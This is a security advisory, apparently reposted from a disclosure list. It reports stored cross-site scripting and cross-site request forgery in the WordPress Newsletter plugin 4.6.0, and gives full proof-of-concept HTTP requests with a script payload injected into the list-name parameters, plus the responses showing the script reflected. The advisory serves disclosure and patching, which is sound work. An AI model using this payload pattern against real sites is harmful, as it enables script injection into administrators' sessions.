WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting

2016.10.14
Credit: Keith Lee
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

Hello, Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is vulnerable to CSRF and XSS. The issue is supposed to be fixed in version 4.6.1 . See https://wordpress.org/plugins/newsletter/changelog/ for more details. 1. Stored Cross-Site Scripting (XSS) Authenticated administrators can inject html/js code (there is no CSRF protection). *Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page= newsletter_subscription_lists *Method: *POST *Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page= newsletter_users_massive *Vulnerable Parameter(s): * options[list_1] options[list_2] options[list_3] options[list_4] options[list_5] options[list_6] options[list_7] options[list_8] options[list_9] options[list_10] options[list_11] options[list_12] options[list_13] options[list_14] options[list_15] options[list_16] options[list_17] options[list_18] options[list_19] options[list_20] *Example Attack:* *Request:* POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page= newsletter_subscription_lists Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 1762 act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin% 2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D= test&options%5Blist_1_status%5D=1&options%5Blist_1_checked% 5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0& options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options% 5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options% 5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_ checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status% 5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=& options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0& options%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<% 2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_ 7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status% 5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=& options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0& options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options% 5Blist_10_checked%5D=0&options%5Blist_11%5D=&options% 5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0& options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options% 5Blist_12_checked%5D=0&options%5Blist_13%5D=&options% 5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0& options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options% 5Blist_14_checked%5D=0&options%5Blist_15%5D=&options% 5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0& options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options% 5Blist_16_checked%5D=0&options%5Blist_17%5D=&options% 5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0& options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options% 5Blist_18_checked%5D=0&options%5Blist_19%5D=&options% 5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0& options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options% 5Blist_20_checked%5D=0 *Response:* HTTP/1.1 200 OK Date: Wed, 28 Sep 2016 17:40:12 GMT Server: Apache X-Powered-By: PHP/7.0.10 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102536 *Request:* GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1 Host: localhost:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://localhost:8888/wordpress/wp-admin/admin.php? page=newsletter_users_massive Content-Type: application/x-www-form-urlencoded Content-Length: 0 *Response:* HTTP/1.1 200 OK Date: Wed, 28 Sep 2016 17:40:37 GMT Server: Apache X-Powered-By: PHP/7.0.10 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98989 For preference <select id="options-list" name="options[list]"><option value="1">(1) test</option><option value="2">(2) </option><option value="3">(3) </option><option value="4">(4) </option><option value="5">(5) </option><option value="6">(6) </option><option value="7">(7) bi1x5&lt;script&gt;alert('spiderlabs')&lt;/script&gt;gjoce</option><option value="8">(8) *Vulnerable PHP Code* /newsletter/subscription/lists.php:51,52 /users/massive.php -- Regards, Keith Lee


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top